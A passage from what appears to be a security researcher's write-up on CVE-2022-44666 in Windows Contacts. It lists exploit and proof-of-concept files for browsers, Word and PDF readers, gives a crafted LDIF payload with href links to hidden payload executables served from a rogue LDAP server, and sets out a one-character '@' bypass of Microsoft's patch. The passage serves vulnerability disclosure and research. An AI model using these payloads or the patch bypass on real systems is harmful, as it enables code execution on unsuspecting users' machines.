src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9gtm51lzb0uo380gygvq4.gif\" \/><\/p><ul><li><p>6.5. PoC for PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/pdfreaders-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/pdfreaders-poc.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9h8491lww0uqobxda3kjm.gif\" \/><\/p><ul><li><p>6.6. Exploit for PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/pdfreaders-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/pdfreaders-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9hnru1m000uo36uo3cept.gif\" \/><\/p><\/li><\/ol><p>Additionally, these are all the files for further exploitation:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc.html<\/a>: HTML file to download KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/remote-weaponized-by-searchms\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/remote-weaponized-by-searchms\/exploit.html<\/a>: HTML file to trigger &#8220;search-ms&#8221; in a remote shared location.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.html<\/a>: remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/poc.html<\/a>: Remote template aka htmlfile activex which triggers &#8220;search-ms&#8221; in a remote shared location.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/poc-vcf.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/poc-vcf.pdf<\/a>: PDF file which triggers default browser to download and execute KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.html<\/a>: HTML file which triggers &#8220;search-ms&#8221; in a remote shared location to be used by PDF Readers.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.pdf<\/a>: PDF which triggers defaul browser to execute uri protocol &#8220;search-ms&#8221;.<\/p><\/li><\/ul><h2>Contact Files<\/h2><p>After receiving <strong><em>Update 2022\/07\/21<\/em><\/strong> from MSRC&#8217;s, i decided to take a look into Contact file extension as it would confirm whether or not it&#8217;s the same case as that found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe located in &#8220;C:\\Program Files\\Windows Mail&#8221; is possible to convert all the VCF files to Contact files.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9i5hl1lxg0uqo0fzx3cym.png\" \/><\/p><p>And as mentioned in the intro updates, these files are opened by Windows Contacts (default program).<\/p><p>The steps to reproduce are the same than those used for VCF files. Same restrictions observed on VCF files are applied with Contact files, that is, it&#8217;s not possible to use remote shared locations for the attribute &#8220;href&#8221; but it&#8217;s still possible to use local paths or url protocol &#8220;search-ms&#8221;.<\/p><p>These are all the files added or modified to exploit Contact files:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries using VCF format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc-vcf.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc-vcf.html<\/a>: HTML file to download KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc-contact.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc-contact.html<\/a>: HTML file to download <a href=\"http:\/\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">KB5014666-hotfix.contact<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries using VCF format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/KKB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/poc-contact.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/poc-contact.pdf<\/a>: PDF file to download <a href=\"http:\/\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">KB5014666-hotfix.contact<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\/KB5001337-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/KB5001337-hotfix.contact<\/a>: Payload which executes binaries by &#8220;search-ms&#8221; in a remote shared location using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.contact<\/a>: Same file than exploit.VCF in Contact file format.<\/p><\/li><\/ul><h2>URL protocol LDAP<\/h2><p>As mentioned above, this further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to ldap uri scheme.<\/p><pre><code>...\nWindows Registry Editor Version 5.00\n\n[HKEY_CLASSES_ROOT\\LDAP]\n@=\"URL:LDAP Protocol\"\n\"EditFlags\"=hex:02,00,00,00\n\"URL Protocol\"=\"\"\n\n[HKEY_CLASSES_ROOT\\LDAP\\Clsid]\n@=\"{228D9A81-C302-11cf-9AA4-00AA004A5691}\"\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell]\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell\\open]\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell\\open\\command]\n@=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\\\n  00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\\\n  4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\\\n  00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00\n...<\/code><\/pre><p>That is:<\/p><pre><code>\"%ProgramFiles%\\Windows Mail\\wab.exe\" \"\/ldap:%1\"\n<\/code><\/pre><p>So just setting a rogue LDAP server up and serving the payload data, it&#8217;s possible to use this url protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that i was unable to do this working on the attribute &#8220;wwwhomepage&#8221; as indicated <a href=\"https:\/\/docs.bmc.com\/docs\/fpsc121\/ldap-attributes-and-associated-fields-495323340.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">here<\/a>, but it should theorically work.<\/p><p>The crafted ldif content is just something like this:<\/p><pre><code>...\ndn: dc=org\ndc: org\nobjectClass: dcObject\n\ndn: dc=example,dc=org\ndc: example\nobjectClass: dcObject\nobjectClass: organization\n\ndn: ou=people,dc=example,dc=org\nobjectClass: organizationalUnit\nou: people\n\ndn: cn=Microsoft,ou=people,dc=example,dc=org\ncn: Microsoft\ngn: Microsoft\ncompany: Microsoft\ntitle: Microsoft KB5001337-hotfix\nmail:\"&gt;&lt;\/a&gt;&lt;a href=\"..\\hidden\\payload.lnk\"&gt;Run-installer...&lt;\/a&gt;\nurl:\"&gt;&lt;\/a&gt;&lt;a href=\"..\\hidden\\payload.exe\"&gt;Run-installer...&lt;\/a&gt;\nwwwhomepage:\"&gt;&lt;\/a&gt;&lt;a href=\"notepad\"&gt;Run-installer...&lt;\/a&gt;\nobjectclass: top\nobjectclass: person\nobjectClass: inetOrgPerson\n...<\/code><\/pre><p>And the code for the rogue ldap server was taken borrowed from the quick start server of ldaptor project, located <a href=\"https:\/\/ldaptor.readthedocs.io\/en\/latest\/quickstart.html#ldap-server-quick-start\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">over here<\/a>.<\/p><p>This is a summary of target applications:<\/p><ul><li><p>Browsers: MS Edge, Google Chrome, Mozilla Firefox &amp; Opera.<\/p><\/li><li><p>MS Word.<\/p><\/li><li><p>PDF Readers (mainly Adobe Acrobat Reader DC &amp; Foxit PDF Reader).<\/p><\/li><\/ul><p>The steps to reproduce are:<\/p><ol><li><p>Copy <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs<\/a> into remote shared location (SMB or WebDav).<\/p><\/li><li><p>If wanted, hide the files running <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/setup-hidden.bat\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/setup-hidden.bat<\/a>.<\/p><\/li><li><p>Install ldaptor by pip: pip install ldaptor. Note this has been tested on Python 2.7 x64.<\/p><\/li><li><p>Start rogue ldap server located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/ldap-rogue-server\/ldap-server.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/ldap-rogue-server\/ldap-server.py<\/a><\/p><\/li><li><p>Start a webserver in the target app path, that is: .\/further-pocs\/[vector or target app]\/url-protocol-ldap\/.<\/p><\/li><li><p>Run exploit files depending on the case.<\/p><\/li><li><p>For further info, watch the videos located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos<\/a><\/p><ul><li><p>7.1. For browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-browsers-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-browsers-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9iuze1lxq0uqo1lvkalir.gif\" \/><\/p><ul><li><p>7.2. For MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-msword-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9j68n1m0n0uo3aoa3hiji.gif\" \/><\/p><ul><li><p>7.3. For PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-pdfreaders-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-pdfreaders-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9jhrb1lxy0uqo4jg4hkm0.gif\" \/><\/p><\/li><\/ol><p>These are the additional files to exploit url protocol ldap:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/url-protocol-ldap\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/url-protocol-ldap\/exploit.html<\/a>: HTML file to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/poc.html<\/a>: remote template aka htmlfile activex to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.html<\/a>: HTML file to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.pdf<\/a>: PDF which triggers defaul browser to execute uri protocol &#8220;ldap&#8221;.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/ldap-rogue-server\/ldap-server.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/ldap-rogue-server\/ldap-server.py<\/a>: Python script based on the server sample for ldaptor, which runs on Python 2.7, and serves the crafted data to exploit the bug through the ldif attributes mail, url and wwwhomepage.<\/p><\/li><\/ul><h2>CVE-2022-44666: Patch analysis and incomplete fix<\/h2><p>On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-44666\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-44666<\/a>.<\/p><p>The versions used for diffing the patch (located in C:\\Program Files\\Common Files\\System\\wab32.dll) have been:<\/p><ul><li><p>MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch)<\/p><\/li><li><p>MD5: D1708215AD2624E666AFD97D97720E81 (post-patch)<\/p><\/li><\/ul><p>Diffing the affected library (wab32.dll) with <a href=\"https:\/\/github.com\/joxeankoret\/diaphora\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Diaphora<\/a> by <a href=\"https:\/\/twitter.com\/matalaz\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@matalaz<\/a>, we&#8217;ll find out some new functions:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9k2ms1m1a0uo3gnnn1u8z.png\" \/><\/p><p>And these are the partial matches:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9k9d91lyr0uqogrwy3gck.png\" \/><\/p><p>Taking a look into the new code in function &#8220;fnSummaryProc&#8221;:<\/p><pre><code>__int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4)\n{\n\n...\n\n    if ( v26 &lt;= 0x824 &amp;&amp; (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) )  \/\/ (1)\n    {\n      v38 = (unsigned __int16 *)2085;\n      v39 = &amp;CPercentEncodeRFC3986::`vftable';\n      v40 = v23;\n      v41 = v26;\n      v28 = CPercentEncodeString::Encode(\n              (CPercentEncodeString *)&amp;v39,\n              (unsigned __int16 *)&amp;Dst,\n              (unsigned __int64 *)&amp;v38,\n              v25);\n      v29 = v7;\n      if ( !v28 )\n      {\n        v30 = (const unsigned __int16 *)&amp;Dst;\nLABEL_44:\n        SafeExecute(v29, v24, v30);  \/\/ (2)\n        return 1i64;\n      }\n    }\n    else\n    {\n      if ( v23 )\n        v32 = IsInternetAddress(v23, &amp;v38);\n      else\n        v32 = 0;\n      v29 = v7;\n      if ( v32 )\n      {\n        v30 = v23;\n        goto LABEL_44; \/\/ (3)\n      }\n    }\n    v31 = GetParent(v29);\n    ShowMessageBox(v31, 0xFE1u, 0x30u); \/\/ (4)\n    return 1i64;\n  }\n  ...\n}<\/code><\/pre><p>After the fix, the new code calls to the function &#8220;SafeExecute&#8221; (2) or show a message box (4).<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9ksk21m1v0uo3f5cw9smu.png\" \/><\/p><p>To reach the call of the function &#8220;SafeExecute&#8221; (2) is possible to follow the code flow in (1):<\/p><pre><code>_BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn)\n{\n  const WCHAR *v1; \/\/ rbx\n  _BOOL8 result; \/\/ rax\n  DWORD pcchOut; \/\/ [rsp+30h] [rbp-68h]\n  char Dst; \/\/ [rsp+40h] [rbp-58h]\n\n  v1 = pszIn;\n  result = 0;\n  if ( UrlIsW(pszIn, URLIS_URL) ) \/\/ (5)\n  {\n    memset_0(&amp;Dst, 0, 0x40ui64);\n    pcchOut = 32;\n    if ( UrlGetPartW(v1, (LPWSTR)&amp;Dst, &amp;pcchOut, 1u, 0) &gt;= 0\n      &amp;&amp; (!(unsigned int)StrCmpICW(&amp;Dst, L\"http\") || !(unsigned int)StrCmpICW(&amp;Dst, L\"https\")) )  \/\/ (6)\n    {\n      result = 1;\n    }\n  }\n  return result;\n}<\/code><\/pre><p>This function first checks if the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/shlwapi\/nf-shlwapi-urlisw\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">URL is valid in (5)<\/a>, then, it checks whether or not it starts with &#8220;http&#8221; or &#8220;https&#8221; in (6). This code path looks safe enough. Coming back to the function &#8220;fnSummaryProc&#8221;, there&#8217;s another code path that could help to bypass the fix in (3).<\/p><pre><code>__int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2)\n{\n  unsigned __int16 v2; \/\/ ax\n  unsigned __int16 **v3; \/\/ r14\n  unsigned __int16 *v4; \/\/ rdi\n  unsigned __int16 *v5; \/\/ r15\n  unsigned __int16 v6; \/\/ dx\n  unsigned __int16 *v7; \/\/ r8\n  unsigned __int16 *v8; \/\/ rcx\n  WCHAR v9; \/\/ ax\n  _WORD *v10; \/\/ rsi\n  int v11; \/\/ ebp\n  LPWSTR v12; \/\/ rax\n  unsigned __int16 *v14; \/\/ rax\n\n  v2 = *a1;\n  v3 = a2;\n  v4 = a1;\n  v5 = a1;\n  while ( v2 &amp;&amp; v2 != 0x3C )\n  {\n    a1 = CharNextW(a1);\n    v2 = *a1;\n  }\n  v6 = *a1;\n  v7 = a1;\n  if ( *a1 )\n  {\n    v8 = a1 + 1;\n    v4 = v8;\n  }\n  else\n  {\n    v8 = v4;\n  }\n  v9 = *v8;\n  v10 = (_WORD *)((unsigned __int64)v7 &amp; -(__int64)(v6 != 0));\n  v11 = v6 != 0;\n  if ( *v8 &amp; 0xFFBF )\n  {\n    while ( v9 &lt;= 0x7Fu &amp;&amp; v9 != 0xD &amp;&amp; v9 != 0xA )\n    {\n      if ( v9 == 0x40 )  \/\/ (7)\n      {\n        v14 = CharNextW(v8);\n        if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) )  \/\/ (8)\n          return 0i64;\n        if ( v3 )\n        {\n          if ( v10 )\n          {\n            *v10 = 0;\n            TrimSpaces(v5);\n          }\n          *v3 = v4;\n        }\n        return 1i64;\n      }\n      v12 = CharNextW(v8);\n      v8 = v12;\n      v9 = *v12;\n      if ( !v9 )\n        return 0i64;\n    }\n  }\n  return 0i64;\n}<\/code><\/pre><p>One thing caught my attention about this in (7), where the code is checking whether it exists a char &#8220;@&#8221;. Then, it calls to the function &#8220;IsDomainName&#8221; in order to check whether or not the string after the char &#8220;@&#8221; is a domain name:<\/p><pre><code>__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)\n{\n  int v3; \/\/ edi\n  int v4; \/\/ ebx\n  int v5; \/\/ er9\n  __int64 v6; \/\/ rdx\n\n  v3 = a3;\n  v4 = a2;\n  if ( !a1 )\n    return 0i64;\nLABEL_2:\n  v5 = *a1;\n  if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 &amp;&amp; (_WORD)v5 == 0x3E )\n    return 0i64;\n  while ( (_WORD)v5 &amp;&amp; (!v4 || (_WORD)v5 != 0x3E) )\n  {\n    if ( (unsigned __int16)v5 &gt;= 0x80u )\n      return 0i64;\n    if ( (unsigned __int16)(v5 - 10) &lt;= 0x36u )\n    {\n      v6 = 19140298416324617i64;\n      if ( _bittest64(&amp;v6, (unsigned int)(v5 - 10)) )\n        return 0i64;\n    }\n    if ( (_WORD)v5 == 46 )\n    {\n      a1 = CharNextW(a1);\n      if ( a1 )\n        goto LABEL_2;\n      return 0i64;\n    }\n    a1 = CharNextW(a1);\n    v5 = *a1;\n  }\n  if ( v4 )\n  {\n    if ( (_WORD)v5 != 0x3E )\n      return 0i64;\n    if ( v3 )\n      *a1 = 0;\n  }\n  return 1i64;\n}<\/code><\/pre><p>So the bypass for the fix is pretty simple. It&#8217;s just necessary to use a single char &#8220;@&#8221;. Symlink href attributes like these will successfully bypass the fix:<\/p><pre><code>hidden\\@payload.lnk\nhidden\\@payload.exe<\/code><\/pre><pre><code>hidden@payload.lnk\nhidden@payload.exe<\/code><\/pre><p>For further info, there&#8217;s a video for a <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/simple-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">standalone contact file<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9lvjn1lzh0uqo6ls8hoxg.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/report-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/report-pocs<\/a>.<\/p><p>And another one for <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/ldap-msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MS Word and LDAP url protocol<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mcdv1lzo0uqocx279si1.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/further-pocs<\/a>.<\/p><p>One day later the patch release, this information was sent to MSRC. Unfortunately, the case has been recently closed with no further info about it.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mkzi1m2t0uo36pzr6ssb.png\" \/><\/p><h2>Diagcab file as payload<\/h2><p>After <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-30190\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-30190<\/a> also known as <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Follina vulnerability<\/a> and <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-34713\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-34713<\/a> also known as <a href=\"https:\/\/www.bleepingcomputer.com\/news\/microsoft\/microsoft-patches-windows-dogwalk-zero-day-exploited-in-attacks\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">DogWalk vulnerability<\/a>, a <a href=\"https:\/\/twitter.com\/buffaloverflow\/status\/1534445288332701697\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">publicly known but underrated technique<\/a> was reborn again thanks to <a href=\"https:\/\/twitter.com\/buffaloverflow\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@buffaloverflow<\/a>. My mate and friend <a 